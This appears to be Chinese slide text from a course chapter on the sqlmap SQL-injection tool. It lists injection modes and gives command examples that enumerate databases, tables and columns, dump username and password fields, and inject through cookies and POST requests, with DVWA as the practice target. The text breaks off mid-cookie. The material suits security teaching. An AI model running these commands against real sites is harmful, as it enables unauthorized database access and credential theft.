第4章_工具sqlmap的使用.pptxVIP

一、什么是SQLmap？ SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，用Python编写。 二、如何下载SQLmap？ 可以通过位于SourceForge的官方网站下载SQLmap源码：/projects/sqlmap/ 三、参考资源 SQL注入之SQLmap入门 /articles/web/29942.html sqlmap使用参数详解 /kali_linux/article/details四、sqlmap支持五种不同的注入模式： 1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。 4、联合查询注入，可以使用union的情况下的注入。 5、堆查询注入，可以同时执行多条语句的执行时的注入。 五、sqlmap支持的数据库 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB 六、检测注入基本格式 1、sqlmap -u “/post.php?id=1″ 默认使用level1，默认检测全部数据库类型 2、sqlmap -u “/post.php?id=1″ --dbms mysql --level 3 指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面） 3、使用cookie注入 sqlmap -u /shownews.asp --cookie id=11 --level 2（只有level达到2才会检测cookie） 七、注入成功后获取数据库基本信息 1、sqlmap -u /post.php?id=1 --level 3 --dbs //查询有哪些数据库 2、sqlmap -u “/post.php?id=1” --level 3 --current-db //查询当前数据库 3、sqlmap -u /post.php?id=1 --level 3 -D test --tables //查询test数据库中有哪些表 4、sqlmap -u /post.php?id=1 --level 3 -D test -T admin --columns //查询test数据库中admin表有哪些字段 5、sqlmap -u /post.php?id=1 --level 3 -D test -T admin -C username, password --dump //dump出字段username与password中的数据 八、举例： C:\Documents and Settings\Administratorsqlmap.py -u /8 /index.php?id=1 --current-db //查询当前数据库 八、举例： C:\Documents and Settings\Administratorsqlmap.py -u /8 /index.php?id=1 -D my_db --tables //查询my_db数据库中有哪些表 八、举例： C:\Documents and Settings\Administratorsqlmap.py -u /8 /index.php?id=1 -D my_db -T thiskey --columns //查询my_db数据库中thiskey表有哪些字段 九、POST注入 扫描网站： /Login.asp 命令一： sqlmap -u /Login.asp --data tfUName=11tfUPass=13“ --level=3 注： “tfUName=11tfUPass=13“ 为POST传递的参数。 九、POST注入 扫描网站： /Login.asp 命令二： sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为BurpSuite所抓的post包 十、扫描DVWA示例（使用cookie参数） 使用SQLmap之前我们得到需要当前会话cookies等信息，用来在渗透过程中维持连接状态，可以使用Firefox中名为“TamperData”的add-on获取。 当前得到的cookie为“security=low;PHPSESSID=57p5